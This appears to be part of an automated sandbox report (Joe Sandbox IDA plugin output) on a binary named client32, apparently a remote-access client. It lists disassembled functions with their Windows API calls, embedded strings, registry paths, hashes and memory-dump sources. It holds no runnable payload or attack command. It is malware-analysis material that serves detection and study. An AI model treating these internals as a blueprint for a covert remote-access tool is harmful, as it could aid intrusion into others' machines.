                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem$CountPixelTick$CombineCreateCursorDeleteMessageObjectPostRectRelease_free
                                                                                • String ID:
                                                                                • API String ID: 4025550384-0
                                                                                • Opcode ID: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
                                                                                • Instruction ID: abc6ed23ccba68bf9f12691c10e6e213c1dc765ac58f2aea97efe2483c19e439
                                                                                • Opcode Fuzzy Hash: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
                                                                                • Instruction Fuzzy Hash: 41A1A271E007099FEBA5DF64C984BEABBF8BF49304F10456DE51A97284EB70A980CF50
                                                                                Function 11049810 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 398COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __wcstoi64
                                                                                • String ID: Adding Journal Item, type=%d$Client$DisableJournal$Journal prevented duplicate lesson details$NC_JOURNAL jcmd=%d$Start Journal, params=%s$Stop Journal$TraceJournal$_debug$libhpdf.dll
                                                                                • API String ID: 398114495-2831585317
                                                                                • Opcode ID: a4eba17e08023296855bf0d54c4ecc45627c38e092dc1e728921e6487a71f37b
                                                                                • Instruction ID: 035b83a0cb74351545b72c4d140cfb5a1e93af7cf425db96e5df00653b109bf5
                                                                                • Opcode Fuzzy Hash: a4eba17e08023296855bf0d54c4ecc45627c38e092dc1e728921e6487a71f37b
                                                                                • Instruction Fuzzy Hash: FFE19578E0420ADFDB05DBA4C8D0FEEB7B5AF49308F248178D8559B784EB75A904CB52
                                                                                Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                • API String ID: 2111968516-2092292787
                                                                                • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                Function 1104D8F0 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 216registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000002,?,00000000,00000000,00000000), ref: 1104DA8B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value__wcstoi64
                                                                                • String ID: %s|%s|$Client$DisableReconnect$MacAddress$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                                                • API String ID: 2540774538-4016704742
                                                                                • Opcode ID: bdc685522d1dff83f107ae5c28b6c13ced0ad49426827611b00069c9eafe322b
                                                                                • Instruction ID: 05e8bff5040e29a5b9abc2ffadfdacbba53fbc28b77198bd54f2eb1c0cd91964
                                                                                • Opcode Fuzzy Hash: bdc685522d1dff83f107ae5c28b6c13ced0ad49426827611b00069c9eafe322b
                                                                                • Instruction Fuzzy Hash: 6871A475E00205AFEB14CBA4CC85FEEF7A8EF59318F24456CE519AB680DB71B900CB61
                                                                                Function 11069590 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 110695BD
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                                • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                                • GetTickCount.KERNEL32 ref: 11069621
                                                                                • wsprintfA.USER32 ref: 11069651
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                                Strings
                                                                                • CloseTransports slept for %u ms, xrefs: 11069630
                                                                                • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                                • idata->n_connections=%d, xrefs: 1106964B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                                • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                                • API String ID: 2285713701-3017572385
                                                                                • Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                                • Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                                Function 1100D690 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                  • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                  • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                                • _strrchr.LIBCMT ref: 1100D6EF
                                                                                • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                                • wsprintfA.USER32 ref: 1100D720
                                                                                • _memset.LIBCMT ref: 1100D731
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 1100D781
                                                                                • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                • String ID: %sNSSilence.exe %u %u$D
                                                                                • API String ID: 1760462761-4146734959
                                                                                • Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                • Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
                                                                                • Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                • Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
                                                                                Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                                • GetStockObject.GDI32(00000007), ref: 11003089
                                                                                • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                                • SelectObject.GDI32(?,?), ref: 110030A7
                                                                                • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                • SelectObject.GDI32(?,?), ref: 11003128
                                                                                • DeleteObject.GDI32(?), ref: 1100312E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                • String ID:
                                                                                • API String ID: 4121194973-0
                                                                                • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                Function 1113F710 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                                • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                                • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                                • GetPropA.USER32(?), ref: 1113F85D
                                                                                • wsprintfA.USER32 ref: 1113F88F
                                                                                • RemovePropA.USER32(?), ref: 1113F8C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                                • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                • API String ID: 2013984029-1590351400
                                                                                • Opcode ID: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                                • Opcode Fuzzy Hash: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                                Function 110099B0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 252COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strtok$_malloc
                                                                                • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                                • API String ID: 665538724-3655815180
                                                                                • Opcode ID: 39f51e78e1d6d557cb57fe6939ee2718794244c86e9f6e4480e23a56394e5660
                                                                                • Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
                                                                                • Opcode Fuzzy Hash: 39f51e78e1d6d557cb57fe6939ee2718794244c86e9f6e4480e23a56394e5660
                                                                                • Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91
                                                                                Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CountClipboardFormats.USER32 ref: 11033091
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                • GetLastError.KERNEL32 ref: 110331BF
                                                                                • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                • API String ID: 3210887762-597690070
                                                                                • Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                • Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                Function 11053590 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 162COMMON
                                                                                Download Yara Rule
                                                                                APIs
